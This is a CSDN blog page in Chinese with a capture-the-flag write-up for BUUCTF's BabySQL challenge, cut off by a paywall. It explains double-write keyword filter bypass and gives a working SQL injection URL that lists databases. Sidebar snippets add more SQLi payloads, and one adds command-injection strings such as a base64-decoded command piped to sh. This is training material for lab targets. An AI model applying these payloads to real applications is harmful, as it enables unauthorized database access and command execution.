web-[极客大挑战 2019]BabySQL

最新推荐文章于 2024-03-03 14:21:53 发布
最新推荐文章于 2024-03-03 14:21:53 发布
阅读量303 收藏
点赞数
分类专栏: BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wojiushilsy/article/details/106092545
版权
本文介绍了极客大挑战2019中关于BabySQL的解题过程,包括如何绕过双写过滤,查询数据库、表名、字段名以及获取数据,最终揭示了隐藏的flag。
摘要由CSDN通过智能技术生成

题目要点

  • 双写绕过:waf将关键字替换为空。

题目内容

在这里插入图片描述

解题

1.查询数据库
/check.php?username=admin&password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(schema_name)%20frfromom%20infoorrmation_schema.schemata%20%23

结果

Hello 2!
Your password is ‘information_schema,mysql,performance_schema,test,ctf,geek’

2.查询表名
/check.php?username
最低0.47元/天 解锁文章
超级神兽小金刚
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
微信小程序-极客学院.zip
04-14
你可以使用双大括号`{{ }}`将变量插入到WXML中,而这些变量的值是在JS中动态更新的。 3. **网络请求**:微信小程序提供了wx.request接口,用于向服务器发送HTTP请求,获取在线小说的数据。 4. **组件化开发**:...
[极客挑战 2019]BabySQL
weixin_41571993的博客
10-04 702
靶场练习
BUUCTF Web [极客挑战 2019]BabySQL
网安小趴菜
08-31 428
BUUCTF Web [极客挑战 2019]BabySQL
BUUCTF---[极客挑战 2019]BabySQL1
最新发布
2201_75556700的博客
03-03 732
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#使用该语句查表名时发现union,select,from,where都被过滤了。8.这里没有得到flag可能是我遗漏了什么,查了资料才发现,flag可能不在我们当前这个数据库里面,想到一开始,我还没查询库名,不知道它有几个苦命,于是使用下面命令进行数据库库名查询。使用下面命令爆第一张表的字段。
[极客挑战 2019]BabySQL 1
qq_43618536的博客
07-02 264
BUUCTF的[极客挑战 2019]BabySQL 1
BUUCTF[极客挑战 2019]BabySQL
rumil的博客
06-25 1931
通过输入非0数字,能正常回显,0和字母不能正常回显,什么都没有显示。刚刚我们输入非0数字正常回显,0和字母不能正常的回显,猜测说明sql语句当中可能存在||运算符,只有输入非0数字,才会返回true,回显条件。可观察网页的源码信息,发现有check.php,猜测可能是登录界面时,输入账号和密码的跳转界面,提示信息。通过上面的过程我们不难发现,此时还存在过滤,from和where也被过滤,同理双写绕过。拿到该靶机,观察界面,存在登录说明存在可能SQL注入,根据题目也可得知存在SQL注入。
buuctf-web-[极客挑战 2019]BabySQL
weixin_46079186的博客
07-02 158
打开网站 输入用户名密码 admin & 123456 返回密码错误 密码后面输入一个单引号页面报错 判断列 当我输入’order by 1#时 他把我or、by 都过滤了 尝试绕过 'oor rder bby y 1 # 成功绕过 判断4个列 ’order by 4# 判断回显点 输入的时候union select 也被过滤了 构造绕过:'ununionion selselectect 1,2,3# 查看数据库名 'uniunionon selselect..
[极客挑战 2019]BabySQL1
qq_75120258的博客
11-09 81
双写绕过的原理是后台利用正则匹配到敏感词将其替换为空。即如果过滤了select,我们输入123select456 后会被检测出敏感词,最后替换得到的字符串由123select456 ---> 123456。这种过滤的绕过也很简单即双写select即可,如:selselectect ---> select ,进行一次这样的过滤就双写,两次就三写以此类推。至于怎么写绕过,我理解的是,比如select被过滤,就在他的中间再写一遍就行了,就像union写成ununionion一样,我理解的是这样,不知道对不对
buuctf-web-[极客挑战 2019]BabySQL-wp
居上
07-16 194
[极客挑战 2019]BabySQL 知识点 双写绕过 过程 主页是一个登录框 随便输入两个参数,发现是传入的是get型参数 首先注入肯定存在,先尝试联合查询注入: check.php?username=admin%27+union+select+1%2C2%2C3%23&password=admin 失败,双写union 和 select可绕过 check.php?username=admin%27+ununionion+seselectlect+1%2C2%2C3%23&pa
BUUCTF之[极客挑战 2019]BabySQL 解决方法
weixin_44632787的博客
06-17 1887
BUUCTF之[极客挑战 2019]BabySQL 解决方法 启动我们的挑战项目 emmmmm这是第三个SQL注入,应该难度又提高了一些。先试试我们的万能密码:1’ or 1=1 # 不行,报错了。而且我也看不出报错的信息是什么 然后返回前面的题目看看提示信息,觉得可能这题是加了一些过滤信息 所以我们试试双写看看能不能绕过防御,并且把最后面的 # 号改成 %23。 所以我们的payload为:1’ oorr 1=1 %23 发现可以获取到信息,说明我们这个方法是正确的! 然后我们再进行用ord
极客标记:极客标记-极客标记系统
02-03
极客标记-极客标记系统 设置服务器 npm install -g gitinspector npm install -g eslint npm install nano --save npm install couch-admin --save npm install pouchdb --save npm install --save pouchdb-find npm...
微信小程序-- 极客学院
04-02
在这个“微信小程序-- 极客学院”资源中,我们可以期待学习到关于如何利用微信小程序平台进行开发的专业知识。 1. 微信小程序基础: 微信小程序的基础包括了它的架构、生命周期和API。学习者需要理解小程序的XML和...
微信小程序实验源码-极客学院 v1.0
12-02
微信小程序实验源码-极客学院是以wxml进行开发的微信小程序源码。 它实现文章列表,文章详情等功能,特色: - 实现右侧菜单栏 - 实现显示markdown内容 数据接口: 使用本地数据接口 目录结构: - image 存放项目图片...
极客与团队-极客与团队1
08-03
极客与团队》这本书由Brian W. Fitzpatrick和Ben Collins-Sussman共同撰写,两位作者来自Google,具有丰富的项目开发和管理经验,特别是在Subversion的开发中扮演了重要角色。这本书聚焦于软件开发中的非技术因素...
web-[GXYCTF2019]Ping Ping Ping
wojiushilsy的博客
05-14 693
题目要点题目内容解题方法一:命令执行变量拼接方法二:过滤bash用sh执行方法三:内联执行(将反引号内命令的输出作为输入执行) 题目要点 linux常见绕过方法 $IFS$9(空格) 命令执行变量拼接 /?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php 过滤bash用sh执行 echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh 内联执行 将反引号内命令的输出作为输入执行 题目内容 解题 打开链接,提示 /?ip在url输入.
web-[极客挑战 2019]EasySQL
wojiushilsy的博客
04-16 443
题目要点题目内容解题 题目要点 SQL注入—万能密码 题目内容 解题 打开链接是一个登陆界面 最开始我认为用户名就是cl4y 只是在试密码 输入单引号'以后报错,应该是字符型注入 万能密码试一试 ????,成功 后面又试了试,用户名只要不是空,用万能密码都可以登录。 ...
web-[ACTF2020 新生赛]Include
wojiushilsy的博客
05-12 379
题目要点题目内容解题 题目要点 php伪协议 题目内容 解题 打开链接,显示 Can you find out the flag? 由题目名称include大概可以猜出是文件包含。 查看URL:http://fe4ed8ea-3593-45fe-b503-460850c823f5.node3.buuoj.cn/?file=flag.php 果然包含有flag.php 构造payload ?file=php://filter/read=convert.base64-encode/resource=.
web-[极客挑战 2019]Http
wojiushilsy的博客
04-30 378
题目要点题目内容解题 题目要点 User-Agent Referer:Referer :请求头包含了当前请求页面的来源页面的地址,即表示当前页面是通过此来源页面里的链接进入的。 X-Forwarded-For:可以被用来获取最初发起请求的客户端的IP地址 题目内容 解题 F12查看源码,发现一个页面。 查看页面。 添加Referer请求头:Referer:https://www.Syc...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值